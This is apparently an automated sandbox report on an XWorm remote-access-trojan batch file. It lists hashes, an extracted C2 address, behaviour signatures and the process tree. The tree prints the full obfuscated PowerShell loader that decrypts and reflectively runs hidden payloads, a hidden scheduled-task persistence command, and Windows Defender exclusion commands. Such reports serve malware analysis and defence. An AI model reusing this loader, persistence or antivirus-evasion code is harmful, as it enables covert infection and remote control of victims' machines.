Overview

overview

10

Static

static

1

XClient.bat

windows7-x64

7

XClient.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    32s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 04:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient.bat

  • Size

    108KB

  • MD5

    85858e630a760180cab51cc060f9b811

  • SHA1

    a9bb8f891c1f6b0fa07f6119304cd3f8798cb1b8

  • SHA256

    9f5f9ef41661f2867dc646b2979808a51a37e1c09a7e01a14d920c4b53a8ab9b

  • SHA512

    753864eecf3478a2f3f78a6743577c8aa81179664786730b0a3ad2ce8307451240a2186af9fb7522f0a1a0f99d6772eb52d684cc23a4c060c92ebfce43d59462

  • SSDEEP

    3072:k2rUR0lBxUPbxNuh/Fqf2Zf5SJi1UF0Mg+O:kwUzjxUh/Fqf2Z5SJxg+O

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

travel-competitive.gl.at.ply.gg:44130

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    SystemProcess.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fWWVT9o7q7zlXGa6pNfiR9GKQf2wkDvKZLYeay8rOwg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TLAL1Gx+pBMDN+bpimtxdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cwxDL=New-Object System.IO.MemoryStream(,$param_var); $klGUs=New-Object System.IO.MemoryStream; $ztGmD=New-Object System.IO.Compression.GZipStream($cwxDL, [IO.Compression.CompressionMode]::Decompress); $ztGmD.CopyTo($klGUs); $ztGmD.Dispose(); $cwxDL.Dispose(); $klGUs.Dispose(); $klGUs.ToArray();}function execute_function($param_var,$param2_var){ $iPgZA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Doivo=$iPgZA.EntryPoint; $Doivo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$gFakL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($cSwQv in $gFakL) { if ($cSwQv.StartsWith(':: ')) { $dibCZ=$cSwQv.Substring(3); break; }}$payloads_var=[string[]]$dibCZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_838_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_838.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5088
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_838.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4824
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_838.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3536
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fWWVT9o7q7zlXGa6pNfiR9GKQf2wkDvKZLYeay8rOwg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TLAL1Gx+pBMDN+bpimtxdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cwxDL=New-Object System.IO.MemoryStream(,$param_var); $klGUs=New-Object System.IO.MemoryStream; $ztGmD=New-Object System.IO.Compression.GZipStream($cwxDL, [IO.Compression.CompressionMode]::Decompress); $ztGmD.CopyTo($klGUs); $ztGmD.Dispose(); $cwxDL.Dispose(); $klGUs.Dispose(); $klGUs.ToArray();}function execute_function($param_var,$param2_var){ $iPgZA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Doivo=$iPgZA.EntryPoint; $Doivo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_838.bat';$gFakL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_838.bat').Split([Environment]::NewLine);foreach ($cSwQv in $gFakL) { if ($cSwQv.StartsWith(':: ')) { $dibCZ=$cSwQv.Substring(3); break; }}$payloads_var=[string[]]$dibCZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1172
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4312
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3912
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\SystemProcess.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4756
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemProcess.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1920

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    f8d49a4af7a844bfc7247d5670def557

    SHA1

    26ae0ce194a77a7a1887cf93741293fdfa6c94c4

    SHA256

    61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

    SHA512

    9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    83685d101174171875b4a603a6c2a35c

    SHA1

    37be24f7c4525e17fa18dbd004186be3a9209017

    SHA256

    0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

    SHA512

    005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    adf7f6ae391ed8c9bff0a86505dc35ee

    SHA1

    690e7f92eae6ad17bff280115ff9a160f1fe0cac

    SHA256

    f968178a44a3aecf7d5c77fc0a474c97b32a7fb5f6e351d585557a23cf7e8d31

    SHA512

    af0e3eb76ab0fa51f196017e506c56b99887b21dfdcd790674164f1937086b94d60596ee65f79c412170b630447ad3aa3aff8ccadaf7ce3dfebec809a40de7a6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieenu4xp.f3p.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_838.bat
    Filesize

    108KB

    MD5

    85858e630a760180cab51cc060f9b811

    SHA1

    a9bb8f891c1f6b0fa07f6119304cd3f8798cb1b8

    SHA256

    9f5f9ef41661f2867dc646b2979808a51a37e1c09a7e01a14d920c4b53a8ab9b

    SHA512

    753864eecf3478a2f3f78a6743577c8aa81179664786730b0a3ad2ce8307451240a2186af9fb7522f0a1a0f99d6772eb52d684cc23a4c060c92ebfce43d59462

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_838.vbs
    Filesize

    115B

    MD5

    67c284ab0d17fce9b2cdb7a6d29a74ea

    SHA1

    2da397a7502e6198770b8157d886ca027fb77da6

    SHA256

    1e5f622bcf9e15f76496d5f65982d5e15c423461c7fadf06445cee9ecff06ea8

    SHA512

    caba04f72846ade8d7f344560da555ac80a17c6e02f7c0a963dbb684cfd621cd7777224056d4b03eda9570c54bceafbddca3c73a4e6e5f32ad6e1cdf74ae6435

    Download Submit

  • memory/1172-49-0x000001EBF7D50000-0x000001EBF7D6C000-memory.dmp

    Filesize

    112KB

    Download

  • memory/3104-13-0x000001FFC27A0000-0x000001FFC27A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3104-14-0x000001FFDB4F0000-0x000001FFDB506000-memory.dmp

    Filesize

    88KB

    Download

  • memory/3104-0-0x00007FF81DCE3000-0x00007FF81DCE5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3104-50-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3104-12-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3104-11-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3104-1-0x000001FFDA930000-0x000001FFDA952000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5088-30-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5088-23-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5088-17-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5088-16-0x00007FF81DCE0000-0x00007FF81E7A1000-memory.dmp

    Filesize

    10.8MB

    Download